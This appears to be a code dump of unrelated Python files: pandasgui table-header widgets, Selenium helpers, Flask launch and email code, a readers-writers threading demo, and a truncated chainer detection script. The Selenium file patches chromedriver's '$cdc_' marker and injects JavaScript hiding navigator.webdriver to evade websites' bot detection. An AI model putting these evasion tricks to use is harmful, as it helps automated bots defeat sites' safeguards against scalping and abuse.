        """Preferred size: frame border plus the summed widths/heights of all cells.

        Scrollbar dimensions are intentionally excluded (dark theme keeps
        scrollbars always visible elsewhere in the layout).
        """
        border = 2 * self.frameWidth()
        width = border + sum(
            self.columnWidth(i) for i in range(self.model().columnCount())
        )
        height = border + sum(
            self.rowHeight(i) for i in range(self.model().rowCount())
        )
        return QtCore.QSize(width, height)
class HeaderModel(QtCore.QAbstractTableModel):
    """Model exposing the DataFrame's columns (horizontal orientation) or
    index (vertical orientation) to a HeaderView."""

    def __init__(self, parent, orientation):
        super().__init__(parent)
        self.orientation = orientation
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf

    def columnCount(self, parent=None):
        # Horizontal: one column per DataFrame column; vertical: one per index level
        if self.orientation == Qt.Horizontal:
            return self.pgdf.df.columns.shape[0]
        else:  # Vertical
            return self.pgdf.df.index.nlevels

    def rowCount(self, parent=None):
        # Horizontal: one row per column level; vertical: one row per DataFrame row
        if self.orientation == Qt.Horizontal:
            return self.pgdf.df.columns.nlevels
        elif self.orientation == Qt.Vertical:
            return self.pgdf.df.index.shape[0]

    def data(self, index, role=QtCore.Qt.DisplayRole):
        """Return the header label text, or a sort-direction icon for the sorted column."""
        row, col = index.row(), index.column()
        if role in (QtCore.Qt.DisplayRole, QtCore.Qt.ToolTipRole):
            if self.orientation == Qt.Horizontal:
                labels = self.pgdf.df.columns
                # MultiIndex cells are addressed (column, level); flat indexes by column only
                return str(labels[col][row] if isinstance(labels, pd.MultiIndex) else labels[col])
            elif self.orientation == Qt.Vertical:
                labels = self.pgdf.df.index
                return str(labels[row][col] if isinstance(labels, pd.MultiIndex) else labels[row])
        if role == QtCore.Qt.DecorationRole:
            if self.pgdf.sort_state == "Asc":
                icon_path = os.path.join(pandasgui.__path__[0], "resources/images/sort-ascending.svg")
            elif self.pgdf.sort_state == "Desc":
                icon_path = os.path.join(pandasgui.__path__[0], "resources/images/sort-descending.svg")
            else:
                return
            # Decorate only the bottom-level cell of the sorted column in the horizontal header
            if col == self.pgdf.sorted_column_ix and row == self.rowCount() - 1 and self.orientation == Qt.Horizontal:
                return QtGui.QIcon(icon_path)

    # The headers of this table will show the level names of the MultiIndex
    def headerData(self, section, orientation, role=None):
        # This was moved to HeaderNamesModel
        pass
class HeaderView(QtWidgets.QTableView):
    """
    Displays the DataFrame index or columns depending on orientation

    Also implements mouse-driven column/row resizing (via an event filter on
    the viewport), double-click sorting, and merging of adjacent equal
    MultiIndex cells into spans.
    """
    def __init__(self, parent: DataFrameViewer, orientation):
        super().__init__(parent)
        self.dataframe_viewer: DataFrameViewer = parent
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf
        self.setProperty('orientation', 'horizontal' if orientation == 1 else 'vertical')  # Used in stylesheet
        # Setup
        self.orientation = orientation
        self.table = parent.dataView
        self.setModel(HeaderModel(parent, orientation))
        # NOTE(review): ``padding`` is not read anywhere in this class — confirm before removing
        self.padding = 90
        # These are used during column resizing
        self.header_being_resized = None
        self.resize_start_position = None
        self.initial_header_size = None
        # Handled by self.eventFilter()
        self.setMouseTracking(True)
        self.viewport().setMouseTracking(True)
        self.viewport().installEventFilter(self)
        # Settings
        self.setIconSize(QtCore.QSize(16, 16))
        self.setSizePolicy(
            QtWidgets.QSizePolicy(
                QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum
            )
        )
        self.setWordWrap(False)
        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
        self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
        font = QtGui.QFont()
        font.setBold(True)
        self.setFont(font)
        # Link selection to DataTable
        self.selectionModel().selectionChanged.connect(self.on_selectionChanged)
        self.set_spans()
        self.horizontalHeader().hide()
        self.verticalHeader().hide()
        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        # Set initial size
        self.resize(self.sizeHint())
    def mouseDoubleClickEvent(self, event):
        """Left double-click on a horizontal header cell sorts the DataFrame by that column."""
        point = event.pos()
        ix = self.indexAt(point)
        col = ix.column()
        if event.button() == QtCore.Qt.LeftButton:
            # When a header is clicked, sort the DataFrame by that column
            if self.orientation == Qt.Horizontal:
                self.pgdf.sort_column(col)
            else:
                self.on_selectionChanged()
        else:
            super().mouseDoubleClickEvent(event)
    def mousePressEvent(self, event):
        """Right-click on a horizontal header cell opens the column menu."""
        point = event.pos()
        ix = self.indexAt(point)
        col = ix.column()
        # NOTE(review): ``col_name`` is unused — confirm before removing
        col_name = self.pgdf.df.columns[col]
        if event.button() == QtCore.Qt.RightButton and self.orientation == Qt.Horizontal:
            self.dataframe_viewer.show_column_menu(col)
        else:
            super().mousePressEvent(event)
    # Header
    def on_selectionChanged(self):
        """
        Runs when cells are selected in the Header. This selects columns in the data table when the header is clicked,
        and then calls selectAbove()
        """
        # Check focus so we don't get recursive loop, since headers trigger selection of data cells and vice versa
        if self.hasFocus():
            dataView = self.dataframe_viewer.dataView
            # Set selection mode so selecting one row or column at a time adds to selection each time
            if (
                self.orientation == Qt.Horizontal
            ):  # This case is for the horizontal header
                # Get the header's selected columns
                selection = self.selectionModel().selection()
                # Removes the higher levels so that only the lowest level of the header affects the data table selection
                last_row_ix = self.pgdf.df.columns.nlevels - 1
                last_col_ix = self.model().columnCount() - 1
                higher_levels = QtCore.QItemSelection(
                    self.model().index(0, 0),
                    self.model().index(last_row_ix - 1, last_col_ix),
                )
                selection.merge(higher_levels, QtCore.QItemSelectionModel.Deselect)
                # Select the cells in the data view
                dataView.selectionModel().select(
                    selection,
                    QtCore.QItemSelectionModel.Columns
                    | QtCore.QItemSelectionModel.ClearAndSelect,
                )
            if self.orientation == Qt.Vertical:
                selection = self.selectionModel().selection()
                last_row_ix = self.model().rowCount() - 1
                last_col_ix = self.pgdf.df.index.nlevels - 1
                higher_levels = QtCore.QItemSelection(
                    self.model().index(0, 0),
                    self.model().index(last_row_ix, last_col_ix - 1),
                )
                selection.merge(higher_levels, QtCore.QItemSelectionModel.Deselect)
                dataView.selectionModel().select(
                    selection,
                    QtCore.QItemSelectionModel.Rows
                    | QtCore.QItemSelectionModel.ClearAndSelect,
                )
        self.selectAbove()
    # Take the current set of selected cells and make it so that any spanning cell above a selected cell is selected too
    # This should happen after every selection change
    def selectAbove(self):
        """Extend the selection to spanning parent cells (currently disabled)."""
        # Disabling this to allow selecting specific cells in headers
        return
        if self.orientation == Qt.Horizontal:
            if self.pgdf.df.columns.nlevels == 1:
                return
        else:
            if self.pgdf.df.index.nlevels == 1:
                return
        for ix in self.selectedIndexes():
            if self.orientation == Qt.Horizontal:
                # Loop over the rows above this one
                for row in range(ix.row()):
                    ix2 = self.model().index(row, ix.column())
                    self.setSelection(self.visualRect(ix2), QtCore.QItemSelectionModel.Select)
            else:
                # Loop over the columns left of this one
                for col in range(ix.column()):
                    ix2 = self.model().index(ix.row(), col)
                    self.setSelection(self.visualRect(ix2), QtCore.QItemSelectionModel.Select)
    # This sets spans to group together adjacent cells with the same values
    def set_spans(self):
        """Merge runs of adjacent equal MultiIndex labels into single spanning cells."""
        df = self.pgdf.df
        self.clearSpans()
        # Find spans for horizontal HeaderView
        if self.orientation == Qt.Horizontal:
            # Find how many levels the MultiIndex has
            if isinstance(df.columns, pd.MultiIndex):
                N = len(df.columns[0])
            else:
                N = 1
            for level in range(N):  # Iterates over the levels
                # Find how many segments the MultiIndex has
                if isinstance(df.columns, pd.MultiIndex):
                    arr = [df.columns[i][level] for i in range(len(df.columns))]
                else:
                    arr = df.columns
                # Holds the starting index of a range of equal values.
                # None means it is not currently in a range of equal values.
                match_start = None
                for col in range(1, len(arr)):  # Iterates over cells in row
                    # Check if cell matches cell to its left
                    if arr[col] == arr[col - 1]:
                        if match_start is None:
                            match_start = col - 1
                        # If this is the last cell, need to end it
                        if col == len(arr) - 1:
                            match_end = col
                            span_size = match_end - match_start + 1
                            self.setSpan(level, match_start, 1, span_size)
                    else:
                        if match_start is not None:
                            match_end = col - 1
                            span_size = match_end - match_start + 1
                            self.setSpan(level, match_start, 1, span_size)
                            match_start = None
        # Find spans for vertical HeaderView
        else:
            # Find how many levels the MultiIndex has
            if isinstance(df.index, pd.MultiIndex):
                N = len(df.index[0])
            else:
                N = 1
            for level in range(N):  # Iterates over the levels
                # Find how many segments the MultiIndex has
                if isinstance(df.index, pd.MultiIndex):
                    arr = [df.index[i][level] for i in range(len(df.index))]
                else:
                    arr = df.index
                # Holds the starting index of a range of equal values.
                # None means it is not currently in a range of equal values.
                match_start = None
                for row in range(1, len(arr)):  # Iterates over cells in column
                    # Check if cell matches cell above
                    if arr[row] == arr[row - 1]:
                        if match_start is None:
                            match_start = row - 1
                        # If this is the last cell, need to end it
                        if row == len(arr) - 1:
                            match_end = row
                            span_size = match_end - match_start + 1
                            self.setSpan(match_start, level, span_size, 1)
                    else:
                        if match_start is not None:
                            match_end = row - 1
                            span_size = match_end - match_start + 1
                            self.setSpan(match_start, level, span_size, 1)
                            match_start = None
    # For the horizontal header, return the column edge the mouse is over
    # For the vertical header, return the row edge the mouse is over
    def over_header_edge(self, mouse_position, margin=3):
        """Return the index of the column/row whose trailing edge is within
        ``margin`` px of ``mouse_position``, or None if not over an edge."""
        # Return the index of the column this x position is on the right edge of
        if self.orientation == Qt.Horizontal:
            x = mouse_position
            if self.columnAt(x - margin) != self.columnAt(x + margin):
                if self.columnAt(x + margin) == 0:
                    # We're at the left edge of the first column
                    return None
                else:
                    return self.columnAt(x - margin)
            else:
                return None
        # Return the index of the row this y position is on the top edge of
        elif self.orientation == Qt.Vertical:
            y = mouse_position
            if self.rowAt(y - margin) != self.rowAt(y + margin):
                if self.rowAt(y + margin) == 0:
                    # We're at the top edge of the first row
                    return None
                else:
                    return self.rowAt(y - margin)
            else:
                return None
    def eventFilter(self, object: QtCore.QObject, event: QtCore.QEvent):
        """Implement drag-resizing of header sections and edge-hover cursors.
        Returns True to consume an event, False to let Qt continue processing."""
        # If mouse is on an edge, start the drag resize process
        if event.type() == QtCore.QEvent.MouseButtonPress:
            if self.orientation == Qt.Horizontal:
                mouse_position = event.pos().x()
            else:
                mouse_position = event.pos().y()
            if self.over_header_edge(mouse_position) is not None:
                self.header_being_resized = self.over_header_edge(mouse_position)
                self.resize_start_position = mouse_position
                if self.orientation == Qt.Horizontal:
                    self.initial_header_size = self.columnWidth(
                        self.header_being_resized
                    )
                elif self.orientation == Qt.Vertical:
                    self.initial_header_size = self.rowHeight(self.header_being_resized)
                return True
            else:
                self.header_being_resized = None
        # End the drag process
        if event.type() == QtCore.QEvent.MouseButtonRelease:
            self.header_being_resized = None
        # Auto size the column that was double clicked
        if event.type() == QtCore.QEvent.MouseButtonDblClick:
            if self.orientation == Qt.Horizontal:
                mouse_position = event.pos().x()
            else:
                mouse_position = event.pos().y()
            # Find which column or row edge the mouse was over and auto size it
            if self.over_header_edge(mouse_position) is not None:
                header_index = self.over_header_edge(mouse_position)
                if self.orientation == Qt.Horizontal:
                    self.dataframe_viewer.auto_size_column(header_index)
                elif self.orientation == Qt.Vertical:
                    self.dataframe_viewer.auto_size_row(header_index)
                return True
        # Handle active drag resizing
        if event.type() == QtCore.QEvent.MouseMove:
            if self.orientation == Qt.Horizontal:
                mouse_position = event.pos().x()
            elif self.orientation == Qt.Vertical:
                mouse_position = event.pos().y()
            # If this is None, there is no drag resize happening
            if self.header_being_resized is not None:
                size = self.initial_header_size + (
                    mouse_position - self.resize_start_position
                )
                # Enforce a minimum section size of 10px while dragging
                if size > 10:
                    if self.orientation == Qt.Horizontal:
                        self.setColumnWidth(self.header_being_resized, size)
                        self.dataframe_viewer.dataView.setColumnWidth(self.header_being_resized, size)
                    if self.orientation == Qt.Vertical:
                        self.setRowHeight(self.header_being_resized, size)
                        self.dataframe_viewer.dataView.setRowHeight(self.header_being_resized, size)
                    self.updateGeometry()
                    self.dataframe_viewer.dataView.updateGeometry()
                return True
            # Set the cursor shape
            if self.over_header_edge(mouse_position) is not None:
                if self.orientation == Qt.Horizontal:
                    self.viewport().setCursor(QtGui.QCursor(Qt.SplitHCursor))
                elif self.orientation == Qt.Vertical:
                    self.viewport().setCursor(QtGui.QCursor(Qt.SplitVCursor))
            else:
                self.viewport().setCursor(QtGui.QCursor(Qt.ArrowCursor))
        return False
    # Return the size of the header needed to match the corresponding DataTableView
    def sizeHint(self):
        """Size the header to line up exactly with the data table it decorates."""
        # Column headers
        if self.orientation == Qt.Horizontal:
            # Width of DataTableView
            width = self.table.sizeHint().width() + self.verticalHeader().width()
            # Height
            height = 2 * self.frameWidth()  # Account for border & padding
            for i in range(self.model().rowCount()):
                height += self.rowHeight(i)
        # Index header
        else:
            # Height of DataTableView
            height = self.table.sizeHint().height() + self.horizontalHeader().height()
            # Width
            width = 2 * self.frameWidth()  # Account for border & padding
            for i in range(self.model().columnCount()):
                width += self.columnWidth(i)
        return QtCore.QSize(width, height)
    # This is needed because otherwise when the horizontal header is a single row it will add whitespace to be bigger
    def minimumSizeHint(self):
        if self.orientation == Qt.Horizontal:
            return QtCore.QSize(0, self.sizeHint().height())
        else:
            return QtCore.QSize(self.sizeHint().width(), 0)
class HeaderNamesModel(QtCore.QAbstractTableModel):
    """Model for the thin strip that displays the DataFrame's column level
    names (horizontal) or index level names (vertical)."""

    def __init__(self, parent, orientation):
        super().__init__(parent)
        self.orientation = orientation
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf

    def columnCount(self, parent=None):
        # One cell wide for the columns strip; one cell per index level otherwise
        if self.orientation == Qt.Horizontal:
            return 1
        elif self.orientation == Qt.Vertical:
            return self.pgdf.df.index.nlevels

    def rowCount(self, parent=None):
        # One cell per column level for the columns strip; a single row otherwise
        if self.orientation == Qt.Horizontal:
            return self.pgdf.df.columns.nlevels
        elif self.orientation == Qt.Vertical:
            return 1

    def data(self, index, role=QtCore.Qt.DisplayRole):
        """Return the level name text, or a sort-direction icon for the sorted index level."""
        row, col = index.row(), index.column()
        if role in (QtCore.Qt.DisplayRole, QtCore.Qt.ToolTipRole):
            if self.orientation == Qt.Horizontal:
                # Unnamed column levels render as empty strings
                name = self.pgdf.df.columns.names[row]
                return "" if name is None else str(name)
            elif self.orientation == Qt.Vertical:
                # Unnamed index levels fall back to the label "index"
                name = self.pgdf.df.index.names[col]
                return "index" if name is None else str(name)
        if role == QtCore.Qt.DecorationRole:
            if self.pgdf.sort_state == "Asc":
                icon_path = os.path.join(pandasgui.__path__[0], "resources/images/sort-ascending.svg")
            elif self.pgdf.sort_state == "Desc":
                icon_path = os.path.join(pandasgui.__path__[0], "resources/images/sort-descending.svg")
            else:
                return
            # Only the vertical strip decorates its sorted index level
            if col == self.pgdf.sorted_index_level and self.orientation == Qt.Vertical:
                return QtGui.QIcon(icon_path)
class HeaderNamesView(QtWidgets.QTableView):
    """
    Thin strip view showing the DataFrame's index or column level names.

    Note: ``rowHeight`` and ``columnWidth`` are overridden below to track the
    corresponding HeaderView's geometry, so this strip always lines up with it.
    """
    def __init__(self, parent: DataFrameViewer, orientation):
        super().__init__(parent)
        self.dataframe_viewer = parent
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf
        self.setProperty('orientation', 'horizontal' if orientation == 1 else 'vertical')  # Used in stylesheet
        # Setup
        self.orientation = orientation
        self.setModel(HeaderNamesModel(parent, orientation))
        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
        self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
        self.horizontalHeader().hide()
        self.verticalHeader().hide()
        self.setSelectionMode(self.NoSelection)
        font = QtGui.QFont()
        font.setBold(True)
        self.setFont(font)
        self.init_size()
    def mouseDoubleClickEvent(self, event):
        """Left double-click on a vertical name cell sorts the DataFrame by that index level."""
        point = event.pos()
        ix = self.indexAt(point)
        if event.button() == QtCore.Qt.LeftButton:
            if self.orientation == Qt.Vertical:
                self.pgdf.sort_index(ix.column())
        else:
            super().mouseDoubleClickEvent(event)
    def init_size(self):
        """Sync this strip's column widths with the index HeaderView."""
        # Match vertical header name widths to vertical header
        if self.orientation == Qt.Vertical:
            for ix in range(self.model().columnCount()):
                # self.columnWidth() is overridden below to read the indexHeader's widths
                self.setColumnWidth(ix, self.columnWidth(ix))
    def sizeHint(self):
        """Match the footprint of the HeaderView this strip decorates."""
        if self.orientation == Qt.Horizontal:
            width = self.columnWidth(0)
            height = self.dataframe_viewer.columnHeader.sizeHint().height()
        else:  # Vertical
            width = self.dataframe_viewer.indexHeader.sizeHint().width()
            height = self.rowHeight(0) + 2
        return QtCore.QSize(width, height)
    def minimumSizeHint(self):
        return self.sizeHint()
    def rowHeight(self, row: int) -> int:
        # Track the column header's row heights so the strips stay aligned
        return self.dataframe_viewer.columnHeader.rowHeight(row)
    def columnWidth(self, column: int) -> int:
        # Horizontal strip collapses to zero width when no column level is named;
        # vertical strip tracks the index header's column widths
        if self.orientation == Qt.Horizontal:
            if all(name is None for name in self.pgdf.df.columns.names):
                return 0
            else:
                return super().columnWidth(column)
        else:
            return self.dataframe_viewer.indexHeader.columnWidth(column)
# This is a fixed size widget with a size that tracks some other widget
class TrackingSpacer(QtWidgets.QFrame):
    """Fixed-size spacer frame whose minimum size mirrors the current width of
    ``ref_x`` and/or height of ``ref_y`` (either reference may be None)."""

    def __init__(self, ref_x=None, ref_y=None):
        super().__init__()
        # Widgets whose geometry this spacer tracks
        self.ref_x = ref_x
        self.ref_y = ref_y

    def minimumSizeHint(self):
        tracked_width = self.ref_x.width() if self.ref_x else 0
        tracked_height = self.ref_y.height() if self.ref_y else 0
        return QtCore.QSize(tracked_width, tracked_height)
# Examples
if __name__ == "__main__":
    # Manual smoke test: open a standalone viewer on the bundled pokemon dataset
    app = QtWidgets.QApplication(sys.argv)
    from pandasgui.datasets import pokemon
    view = DataFrameViewer(pokemon)
    view.show()
    app.exec_()
|
selenium_utils.py | from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
# Shared ChromeOptions used by every driver this module builds.
options = Options()
# Hide the "controlled by automated test software" banner and suppress
# chromedriver's console logging.
options.add_experimental_option(
    "excludeSwitches", ["enable-automation", "enable-logging"]
)
# Skip the automation extension (another automation tell-tale).
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
    """Use with WebDriverWait to combine expected_conditions in an OR.

    Each wrapped condition is polled in turn; the first truthy result wins.
    Conditions that raise are treated as "not satisfied yet".
    """

    def __init__(self, *args):
        self.ecs = args

    def __call__(self, driver):
        for fn in self.ecs:
            try:
                if fn(driver):
                    return True
            except Exception:
                # Expected-condition helpers raise while the page is still
                # loading; try the next condition.  A bare ``except:`` (as
                # before) would also swallow KeyboardInterrupt, so narrow it.
                continue
        # Falsy, so WebDriverWait keeps polling (the old implicit None did
        # the same; an explicit False is clearer).
        return False
def no_amazon_image():
    """Block image loading in the shared Chrome options (pref value 2 = block)."""
    options.add_experimental_option(
        "prefs", {"profile.managed_default_content_settings.images": 2}
    )
def yes_amazon_image():
    """Restore image loading in the shared Chrome options (0 = browser default)."""
    options.add_experimental_option(
        "prefs", {"profile.managed_default_content_settings.images": 0}
    )
def wait_for_element(d, e_id, time=30):
    """Wait up to ``time`` seconds for the element with id ``e_id`` to exist."""
    locator = (By.ID, e_id)
    waiter = WebDriverWait(d, time)
    return waiter.until(ec.presence_of_element_located(locator))
def wait_for_element_by_xpath(d, e_path, time=30):
    """Wait up to ``time`` seconds for an element matching XPath ``e_path``."""
    waiter = WebDriverWait(d, time)
    return waiter.until(ec.presence_of_element_located((By.XPATH, e_path)))
def wait_for_element_by_class(d, e_class, time=30):
    """Wait up to ``time`` seconds for an element with class ``e_class``."""
    locator = (By.CLASS_NAME, e_class)
    return WebDriverWait(d, time).until(ec.presence_of_element_located(locator))
def wait_for_title(d, title, path):
    """
    Uses webdriver(d) to navigate to get(path) until it equals title(title)
    """
    # Re-load ``path`` until the browser reports the expected title.
    while d.title != title:
        d.get(path)
        # NOTE(review): constructing WebDriverWait without calling .until(...)
        # is a no-op — this line waits for nothing, so the loop hammers
        # d.get() back-to-back.  Probably intended something like
        # WebDriverWait(d, ...).until(ec.title_is(title)); confirm before
        # relying on this as a throttle.
        WebDriverWait(d, 1000)
def wait_for_page(d, title, time=30):
    """Block until the page title equals ``title`` (up to ``time`` seconds)."""
    condition = ec.title_is(title)
    WebDriverWait(d, time).until(condition)
def wait_for_either_title(d, title1, title2, time=30):
    """Wait for the page title to become ``title1`` or ``title2``.

    Timeouts are swallowed: on expiry the function simply returns.
    """
    either = AnyEc(ec.title_is(title1), ec.title_is(title2))
    try:
        WebDriverWait(d, time).until(either)
    except Exception:
        pass
def wait_for_any_title(d, titles, time=30):
    """Wait for the page title to become any entry of ``titles``."""
    conditions = [ec.title_is(t) for t in titles]
    WebDriverWait(d, time).until(AnyEc(*conditions))
def button_click_using_xpath(d, xpath):
    """Move to the button located by ``xpath``, pause briefly, then click it."""
    target = WebDriverWait(d, 10).until(
        ec.element_to_be_clickable((By.XPATH, xpath))
    )
    # The pause makes the interaction look less bot-like.
    ActionChains(d).move_to_element(target).pause(1).click().perform()
def field_send_keys(d, field, keys):
    """
    Uses webdriver(d) to find a field(field), clears it and sends keys(keys)
    """
    # find_element_by_name() was removed in Selenium 4; find_element(By.NAME,
    # ...) works on both Selenium 3 and 4 (By is already imported above).
    elem = d.find_element(By.NAME, field)
    elem.clear()
    elem.send_keys(keys)
def has_class(element, class_name):
    """Return True if ``element``'s class attribute contains ``class_name``.

    Matches whole class tokens: ``"btn"`` matches ``class="btn active"`` but
    not ``class="btn-primary"`` (the previous substring test matched both).
    Elements with no class attribute report False instead of raising.
    """
    classes = element.get_attribute("class")
    if not classes:
        return False
    return class_name in classes.split()
def add_cookies_to_session_from_driver(driver, session):
    """Copy the browser's cookies into a ``requests`` session.

    Only domain/name/value are carried over; path, expiry and flags are
    dropped (matching the original behaviour).
    """
    # Plain loop: the original abused a list comprehension for side effects.
    for cookie in driver.get_cookies():
        session.cookies.set_cookie(
            requests.cookies.create_cookie(
                domain=cookie["domain"],
                name=cookie["name"],
                value=cookie["value"],
            )
        )
def enable_headless():
    """Switch the shared options to headless mode (CI/container friendly)."""
    for flag in ("--headless", "--no-sandbox", "--disable-dev-shm-usage"):
        options.add_argument(flag)
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
    """Randomise chromedriver's injected JS marker variable in the binary.

    Chromedriver embeds a ``$cdc_``-style variable (``$`` + 3 lowercase +
    ``_`` + 22 alphanumerics + ``_``) that sites probe to detect automation;
    rewriting it in the binary at ``loc`` defeats that check.  No-op when
    the marker is not found.
    """
    # Context managers replace the original manual open/close pairs, which
    # leaked the handle on any exception.
    with open(loc, 'rb') as fin:
        data = fin.read()
    # Fresh marker with the same shape so the binary's layout is unchanged.
    val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
        "".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
    result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
    if result is not None:
        status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
        data = data.replace(result.group(0), val.encode())
        # 'wb' truncates on open, so the explicit truncate() was redundant.
        with open(loc, 'wb') as fout:
            fout.write(data)
def open_browser(link, cookies):
    """Launch ``start_browser`` on a background thread and return immediately."""
    worker = threading.Thread(target=start_browser, args=(link, cookies))
    worker.start()
def start_browser(link, cookies):
    """Open a stealthy Chrome window on ``link`` with the given cookies.

    ``cookies`` is an iterable of dicts with name/value/domain keys.  The
    page is loaded once so the cookie domains are valid, cookies are added,
    then the page is reloaded with them in place.
    """
    # "eager" returns control at DOMContentLoaded instead of full page load.
    caps = DesiredCapabilities().CHROME
    caps["pageLoadStrategy"] = "eager"
    chrome_options = ChromeOptions()
    # Same anti-detection switches as the module-level options.
    chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
    chrome_options.add_experimental_option("useAutomationExtension", False)
    driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
    # Inject JS before every document loads: wrap navigator in a Proxy that
    # hides the ``webdriver`` property sites use to fingerprint Selenium.
    driver.execute_cdp_cmd(
        "Page.addScriptToEvaluateOnNewDocument",
        {
            "source": """
            Object.defineProperty(window, 'navigator', {
                value: new Proxy(navigator, {
                    has: (target, key) => (key === 'webdriver' ? false : key in target),
                    get: (target, key) =>
                        key === 'webdriver'
                        ? undefined
                        : typeof target[key] === 'function'
                        ? target[key].bind(target)
                        : target[key]
                })
            })
        """
        },
    )
    # First load establishes the domain so add_cookie() is allowed.
    driver.get(link)
    for cookie in cookies:
        driver.add_cookie({
            "name": cookie["name"],
            "value": cookie["value"],
            "domain": cookie["domain"]
        })
    # Reload so the page sees the injected cookies.
    driver.get(link)
|
__main__.py | import threading
from HomeTuner import setup_logging, scan, init_assets, create_app, control
setup_logging()
init_assets()
# Run the scanner loop on a background thread so the web app stays responsive.
scanner = threading.Thread(target=scan.main, args=[])
scanner.start()
app = create_app()
# 0.0.0.0: reachable from the LAN; threaded=True: serve concurrent requests
# alongside the scanner thread.
app.run(host='0.0.0.0', threaded=True)
example1.py | # ch13/ch01_ex01.py
import threading
def writer():
    """Endlessly append to the shared ``text``, holding ``resource`` exclusively."""
    global text
    while True:
        with resource:
            print(f'Writing being done by {threading.current_thread().name}.')
            text += f'Writing was done by {threading.current_thread().name}. '
def reader():
    """First readers-writers protocol: readers share access, writers exclude."""
    global rcount
    while True:
        # Entry section: the first reader in locks writers out of ``resource``.
        with rcounter:
            rcount += 1
            if rcount == 1:
                resource.acquire()
        print(f'Reading being done by {threading.current_thread().name}:')
        print(text)
        # Exit section: the last reader out releases ``resource`` for writers.
        with rcounter:
            rcount -= 1
            if rcount == 0:
                resource.release()
# Shared state: the text buffer, the live-reader count, and its guard lock.
text = 'This is some text. '
rcount = 0
rcounter = threading.Lock()
# Held by writers, and by the reader group as a whole (first in / last out).
resource = threading.Lock()
# Three readers and two writers contend forever (the threads never exit).
threads = [threading.Thread(target=reader) for i in range(3)] + [threading.Thread(target=writer) for i in range(2)]
for thread in threads:
    thread.start()
|
email.py | from threading import Thread
from flask import current_app
from flask_mail import Message
from myapp import mail
def send_async_email(app, msg):
    """Deliver ``msg`` from a worker thread inside ``app``'s context."""
    # Flask-Mail reads configuration from the app, and worker threads have
    # no request/app context of their own — push one explicitly.
    with app.app_context():
        mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body, attachments=None, sync=False):
    """Build and send an email, inline when ``sync`` else on a worker thread.

    ``attachments`` is an optional iterable of argument tuples forwarded to
    ``Message.attach``.
    """
    msg = Message(subject, sender=sender, recipients=recipients)
    msg.body = text_body
    msg.html = html_body
    for attachment in attachments or ():
        msg.attach(*attachment)
    if sync:
        mail.send(msg)
        return
    # current_app is a context-local proxy; hand the real app object to the
    # thread, which runs outside this application context.
    app = current_app._get_current_object()
    Thread(target=send_async_email, args=(app, msg)).start()
inference.py | import matplotlib.pyplot as plt
from PIL import Image,ImageDraw
import math
import glob
import os
import datetime
import numpy as np
from chainer import serializers
from chainercv.datasets import voc_bbox_label_names
from chainercv.links import FasterRCNNVGG16
from chainercv.links import SSD512
from chainercv.links import SSD300
from chainercv.utils import read_image
from chainercv.visualizations import vis_bbox
import cv2
import cv2 as cv
from collections import deque
import time
import multiprocessing
import concurrent.futures as confu
# Earlier checkpoints kept for reference:
# model_name = 'model/2020_6_2.npz'
# model_name = 'model/2020_7_2.npz'
model_name = 'model/2020_9_18.npz'  # active SSD512 checkpoint
result_path = "majomoji/inference/result"  # per-image result dumps go here
color = [255.0, .0, .0]  # RGB red used for box outlines and labels
# Single-image inference helper.
def run(img, model):
    """Predict boxes for one image and round them to integer pixels.

    Returns (float32 ndarray of [y0, x0, y1, x1] boxes, labels, scores) for
    the first (only) image in the batch.
    """
    bboxes, labels, scores = model.predict([img])
    # Floor the top-left corner and ceil the bottom-right so the integer
    # box always contains the raw prediction.
    snapped = [
        [math.floor(y0), math.floor(x0), math.ceil(y1), math.ceil(x1)]
        for y0, x0, y1, x1 in bboxes[0]
    ]
    return np.array(snapped, 'f'), labels[0], scores[0]
# Parallel inference worker (multiprocessing.Process target).
def multi_run(img, model, send_rev, rad, center):
    """Predict on a rotated image and pipe back de-rotated integer boxes.

    Sends ``[bboxes, labels, scores]`` through ``send_rev`` so the parent
    process can collect results after joining the workers.
    """
    bboxes, labels, scores = model.predict([img])
    snapped = [
        [math.floor(y0), math.floor(x0), math.ceil(y1), math.ceil(x1)]
        for y0, x0, y1, x1 in bboxes[0]
    ]
    snapped = np.array(snapped, 'f')
    # Map the boxes back into the unrotated image's coordinate frame.
    unrotated = moldingrotation(rad, center, snapped)
    send_rev.send([unrotated, labels[0], scores[0]])
def multi_run2(img, model, rad, center):
    """Like ``multi_run`` but returns its result (for ProcessPoolExecutor).

    Returns (de-rotated boxes, labels, scores) for the first batch entry.
    """
    bboxes, labels, scores = model.predict([img])
    snapped = [
